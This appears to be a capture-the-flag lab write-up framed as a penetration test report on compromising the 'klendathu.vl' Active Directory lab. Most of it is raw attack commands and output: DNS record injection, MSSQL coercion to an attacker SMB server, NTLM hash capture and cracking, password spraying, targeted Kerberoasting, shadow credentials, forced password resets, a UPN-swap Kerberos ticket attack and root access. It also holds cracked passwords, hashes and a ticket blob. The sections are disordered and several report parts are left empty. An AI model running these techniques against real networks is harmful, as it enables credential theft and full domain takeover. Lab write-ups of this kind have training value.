Executive Summary
This comprehensive report documents a simulated penetration test aimed at assessing the security posture of a corporate network with the ultimate goal of compromising the a domain controller. The test was designed to emulate a sophisticated adversarial attack that strategically uses multiple cycles of lateral movement and privilege escalation. The test utilized a variety of attack techniques that align with the MITRE ATT&CK framework, each carefully chosen to exploit specific vulnerabilities within the network.
Key findings include several high-risk vulnerabilities that allowed for successive breaches and escalations within the network infrastructure, culminating in complete control over the domain controller. The report concludes with targeted recommendations for strengthening the network’s defenses, improving detection capabilities, and reducing the overall attack surface.
python3 gssapi-abuse.py -d klendathu.vl dns -t attacker -a add --type A --data 10.8.2.41
python3 gssapi-abuse.py -d klendathu.vl dns --zone 2.8.10.in-addr.arpa -t 41 -a add --type PTR --data attacker.klendathu.vl.
# Generated by NetworkManager
search klendathu.vl net.rogers.com
nameserver 10.10.232.85
nameserver 64.71.255.198
nameserver 2607:f798:18:10:0:640:7125:5204
# NOTE: the libc resolver may not support more than 3 nameservers.
# The nameservers listed below may not be recognized.
nameserver 2607:f798:18:10:0:640:7125:5198
/etc/hosts
10.10.169.149 dc1.klendathu.vl dc1 klendathu.vl
10.10.169.150 srv1.kendathu.vl srv1
10.10.169.151 srv2.klendathu.vl srv2
/etc/krb5.conf
[libdefaults]
default_realm = klendathu.vl
kdc_timesync = 1
ccache_type = 4
forwardable = true
proxiable = true
fcc-mit-ticketflags = true
[realms]
klendathu.vl = {
kdc = dc1.klendathu.vl
admin_server = dc1.klendathu.vl
}
select * from sys.dm_os_file_exists('\\10.8.2.41\Projects')
impacket-smbserver Projects /tmp -smb2support
RASCZAK::KLENDATHU:aaaaaaaaaaaaaaaa:4d26b714455e2a7314edc525e223385c:0101000000000000808ddfaae5afda01da603c0f3d0c5e1f00000000010010007000540076006f00470072007a005400030010007000540076006f00470072007a0054000200100049004700500077005300630061005600040010004900470050007700530063006100560007000800808ddfaae5afda01060004000200000008003000300000000000000000000000003000001000db172de54e605997d679e908a34d1f80c0e58d7d484e6d46f57bfb2fc2b00a0010000000000000000000000000000000000009001c0063006900660073002f00310030002e0038002e0032002e00340031000000000000000000
hashcat rasczak_hash /usr/share/wordlists/rockyou.txt
starship99
dn: CN=RICO,CN=Users,DC=KLENDATHU,DC=VL
changetype: modify
replace: userPrincipalName
userPrincipalName: leivy
└─$ cat modify_upn.ldif
dn: CN=IBANEZ,CN=Users,DC=KLENDATHU,DC=VL
changetype: modify
replace: userPrincipalName
userPrincipalName: Administrator
ldapmodify -H ldap://dc1.klendathu.vl -Y GSSAPI -f modify_upn.ldif
ldapsearch -H ldap://dc1.klendathu.vl -Y GSSAPI -b "CN=RICO,CN=Users,DC=KLENDATHU,DC=VL" -s base "(objectClass=*)"
python3 ./targetedKerberoast.py -v -d klendathu.vl -u 'rasczak' -p 'starship99'
vim rich.hash
vim ibanez.hash
no success cracking the password.
python3 pywhisker.py -d "klendathu.vl" -u "rasczak" -p "starship99" --target "ibanez" --action "add" -e pem
Saved PEM certificate at path: TC4RwUeC_cert.pem
[+] Saved PEM private key at path: TC4RwUeC_priv.pem
Shodow didn’t work
net rpc password "ibanez" "starship99" -U "klendathu.vl"/"rasczak"%"starship99" -S 10.10.193.181
net rpc password "rico" "starship99" -U "klendathu.vl"/"rasczak"%"starship99" -S 10.10.193.181
.\Rubeus.exe asktgt /user:leivy /password:starship99 /domain:KLENDATHU.VL /dc:dc1.klendathu.vl /principaltype:enterprise /nowrap
./rubeustoccache.py doIFNDCCBTCgAwIBBaEDAgEWooIETDCCBEhhggREMIIEQKADAgEFoQ4bDEtMRU5EQVRIVS5WTKIhMB+gAwIBAqEYMBYbBmtyYnRndBsMS0xFTkRBVEhVLlZMo4IEBDCCBACgAwIBEqEDAgEEooID8gSCA+5H8Kz0eUeEP0kC67LYykRYdoQRYLET8Am/+byOUMoYloBwyAxIUvLsoGlLniU/+PgG1Od2HRieLk4UMFj7ZUWUM0CHZxC9qKFyD23JmiJrfgSS7l6Jh9KH1xwch4BtMPpsnhThonwpEpjavauZ5yfd+LDWyCNd5iLZd4HqvPzY4YFgHJ/i0bGDeLdcQ6Dpyp28W/gn8aJYSte4PiCrP3BlyxLcs31N6lh+r/Dmq6YxH47A2j4HsAmNIg1ZWamdgfFxkJ+ayuQlwneWl3e++y0fcQTTepz/a4FNXhB2zBAHqeezBRmdAri6eoEgs1OQL01ZcKG8NCIAq1Kbxk8fRjI6soigLZJ7+9pjWE4hwxdmSl6qaEApms/nm0eHMBctYRDbinvxyYuICy+npooacauJ6ekEpqoGvH5hb9Ck6zQDn1cyweFk8swqGI0aZP2hi5Gua398NKT2KKNhOwQl+a/bh4KnciCE8QsqcLcEHnyZTiiv2uLjZ/mLywZtxOagxSiSVQudxFav8JvohCx8tM18RpQTY5k3FQamcr/EZZIuefkp2cXe8KjBSGg+MXjTLGHHTh9BnXlQsl2RiAgCfZhpZ2B0XttALoHw8KekmrnO34cwHRKPUqqGerXrgfzL+GNWWkQUIAGqSH+FOGiWDcSVdQedsVtu3FGU6ZPt1Cw6g5fdFMaAWou8WLvhCaEe0dptmYDgYaP0pe26II0juj9ihxgvV8Yt/+zv/RZ0kWefMoARV6oOGa4N+uw3r21OibwPR3jV5VBoV+XuH1lQ7F4hPVNTTTLGh1zJNiYyxsx+4BvpuVPMvBAelj6w5Tn+7trhiT8pg+mLPEfuNyP9/FA6d+LimaL4NZCJxZ/NuerI+o+IsELMXYMMCiluBQaq7E/eVZoLUyYyWBvpS6T8Jeto+AstfgB/TQfYu9OTcOBTxJ49UeNTF1o2GMHza/u3S58wpYdli57Ru2/yxTjQLysP9iw3+nQR6m5FbKhL51DMlfHB2UOWXcWqO5vGTFw1AjLDkiBaeFHj6v+s/4jHl+fqdVudVsDa8E9uhNNOo8DJYs9H5Zd6UEEzgFx6bopzzaNGTBmfwVZwNerpwGciL76U9XkTMf9M75nhdAdDTmUC9gpq1MNJ0bhxDk9L8qAIJQgx6qZTDfCBxY1YwClxSgD2tkexfIyAnP0WAVkDYm38aK5h5fU9ID3f1PSUD8E47XGl4ZP/dxQBxR/Nc3XKBz6tVqxGkx7PjVYH3+KFcPSoGKdmO5chREmY+seyD2dLmRoVcwpNjraOS77Dwlc41tjFA4Zf9CXQjUbZIxphZbXcqz2l8qtEeQ8mwiUIvB1Oo4HTMIHQoAMCAQCigcgEgcV9gcIwgb+ggbwwgbkwgbagGzAZoAMCARehEgQQVQvGI4P5Bk8sTndw1fXQ0qEOGwxLTEVOREFUSFUuVkyiEjAQoAMCAQqhCTAHGwVsZWl2eaMHAwUAQOEAAKURGA8yMDI0MDUyNzA2MTAxMVqmERgPMjAyNDA1MjcxNjEwMTFapxEYDzIwMjQwNjAzMDYxMDExWqgOGwxLTEVOREFUSFUuVkypITAfoAMCAQKhGDAWGwZrcmJ0Z3QbDEtMRU5EQVRIVS5WTA== leivy.kirbi leivy.ccache
export KRB5CCNAME=leivy.ccache
ssh -K leivy@klendathu.vl@srv2.klendathu.vl
[root@srv2 ~]# cat flag.txt
VL{8ceb4b1bb4e74306d60d148fb85052fd}
High-Level Summary
- Key Vulnerabilities: Identified critical vulnerabilities included insecure service configurations, credential misuse.
- Attack Path: Demonstrated a multi-layered attack strategy involving multiple stages of lateral movement and privilege escalations.
- Impact: Full domain compromise was achieved, highlighting significant risks in current security practices and the potential for severe data breaches and system manipulation.
Key Findings
| Stage | Target Service | Technique | CVSS Score | Impact |
|---|---|---|---|---|
| 1 | SMB Shares | Credential Access | 6.5 | Medium |
| 2 | SMB Shares | Data from Local System | 7.0 | High |
| 3 | Active Directory Users | Password Spraying for Valid Account Identification | 7.5 | High |
| 4 | Changing Passwords | Account Manipulation | 8.0 | High |
| 5 | Active Directory | Directory Service Discovery | 7.8 | High |
| 6 | Active Directory | Modification of Group Membership & Extracting Service Account Credentials | 8.2, 7.5 | High |
| 7 | Domain Controller | Remote Code Execution | 8.5 | High |
| 8 | Privilege Escalation | Silver Ticket Attack, SE Impersonate Privilege | 9.0 | Critical |
Attack Flow and Narrative
Detailed Findings
| ID | IP | Domain | DC |
|---|---|---|---|
| DC1 | 10.10.216.165 | klendathu.vl | DC1.klendathu.vl |
| SRV1 | 10.10.216.166 | klendathu.vl | DC1.klendathu.vl |
| Linux Machine | 10.10.216.167 |
Enumeration: Phase-1
Port Scanning (10.10.216.167)
sudo nmap -sC -sV -oA linux 10.10.216.167
| Port | Service | Version |
|---|---|---|
| 22 | ssh | OpenSSH 8.7 |
| 111 | rpcbind | 2-4 |
| 2049 | nfs_acl | 3 |
showmount -e 10.10.216.167
mkdir shared
sudo mount -t nfs -o vers=3,nolock 10.10.216.167:/mnt/nfs_shares ./shared
| Category | Details |
|---|---|
| Hostname | Switch |
| Enable Password | C1sc0 (plaintext) |
| Enable Secret | j61qxI/P$dPYII5uCu83j8/FIuT2Wb/ (football22) |
| Console Line Password | 123456 |
| VTY Line Passwords | 123456 (for both 0-4 and 5-15) |
| SNMP Contact | ZIM@KLENDATHU.VL |
echo '$1$j61qxI/P$dPYII5uCu83j8/FIuT2Wb/' > hash.txt
hashcat hash.txt /usr/share/wordlists/rockyou.txt
$1$j61qxI/P$dPYII5uCu83j8/FIuT2Wb/:football22
Now with the list of password and username we try to perform password spraying.
Password Spraying
cme smb ips.txt -u 'users.txt' -p 'passwords.txt' --continue-on-success
User enumeration
cme smb ips.txt -u 'zim' -p 'football22' --users
| Domain User | Description |
|---|---|
| KLENDATHU.VL\Administrator | Built-in account for administering the computer/domain |
| KLENDATHU.VL\Guest | Built-in account for guest access to the computer/domain |
| KLENDATHU.VL\krbtgt | Key Distribution Center Service Account |
| KLENDATHU.VL\RICO | |
| KLENDATHU.VL\JENKINS | |
| KLENDATHU.VL\IBANEZ | |
| KLENDATHU.VL\ZIM | |
| KLENDATHU.VL\DELADRIER | |
| KLENDATHU.VL\ALPHARD | |
| KLENDATHU.VL\LEIVY | |
| KLENDATHU.VL\FRANKEL | |
| KLENDATHU.VL\HENDRICK | |
| KLENDATHU.VL\PATERSON | |
| KLENDATHU.VL\AZUMA | |
| KLENDATHU.VL\CHERENKOV | |
| KLENDATHU.VL\CLEA | |
| KLENDATHU.VL\DUNN | |
| KLENDATHU.VL\FLORES | |
| KLENDATHU.VL\SHUJUMI | |
| KLENDATHU.VL\BARCALOW | |
| KLENDATHU.VL\BRECKENRIDGE | |
| KLENDATHU.VL\BYRD | |
| KLENDATHU.VL\MCINTHIRE | |
| KLENDATHU.VL\RASCZAK | |
| KLENDATHU.VL\svc_backup | Legacy account to sync data to users Home Directories |
BloodHound Data Collection
cme ldap ips.txt -u 'zim' -p 'football22' --bloodhound -c all -ns 10.10.216.165
MSSQL (10.10.216.166)
mssqlclient.py KLENDATHU.VL/zim:football22@10.10.216.166 -windows-auth
Recommendations
SMB Shares (Credential Access and Data Exposure)
-
Secure SMB Shares: Ensure that SMB shares are properly secured. Disable guest access and enforce strong access control policies.
-
Data Encryption: Encrypt sensitive data stored on SMB shares to prevent unauthorized access.
Active Directory (Password Spraying, Account Manipulation, Directory Service Discovery)
Conclusion
By following the above recommendations, the security posture of the network can be significantly improved, reducing the risk of future breaches and ensuring a more robust defense against sophisticated cyber attacks.
Loot
[root@srv2 ~]# cat anaconda-ks.cfg
# Generated by Anaconda 34.25.4.7
# Generated by pykickstart v3.32
#version=RHEL9
# Use text mode install
text
%addon com_redhat_kdump --disable
%end
# System language
lang en_US.UTF-8
# Network information
#network --bootproto=static --device=ens160 --gateway=172.23.10.1 --ip=172.23.10.92 --nameserver=172.23.10.90 --netmask=255.255.255.0 --activate
network --hostname=srv2
%packages
@^server-product-environment
%end
# Run the Setup Agent on first boot
firstboot --enable
# Do not configure the X Window System
skipx
# Generated using Blivet version 3.6.0
ignoredisk --only-use=nvme0n1
# System bootloader configuration
bootloader --location=mbr --boot-drive=nvme0n1
autopart
# Partition clearing information
clearpart --all --initlabel --drives=nvme0n1
# System timezone
timezone America/New_York --utc
# Root password
rootpw --iscrypted $6$K0nkB9PnZ1DOJZAr$GzWFDigX5/QoFje5Mq8on9JcR2ba2gZjwBwWsx1.g8HELZiRCBWdNsDeFClAep2q7e.urhvhB/N7WxBP8NskQ0